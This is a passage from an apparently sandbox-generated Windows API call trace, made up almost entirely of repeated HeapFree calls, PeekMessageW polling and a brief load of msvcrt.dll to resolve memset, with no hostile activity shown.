hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.448] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.449] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.450] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0168.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0168.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.450] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.451] FreeLibrary (hLibModule=0x75c90000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.452] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.452] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0168.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.453] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 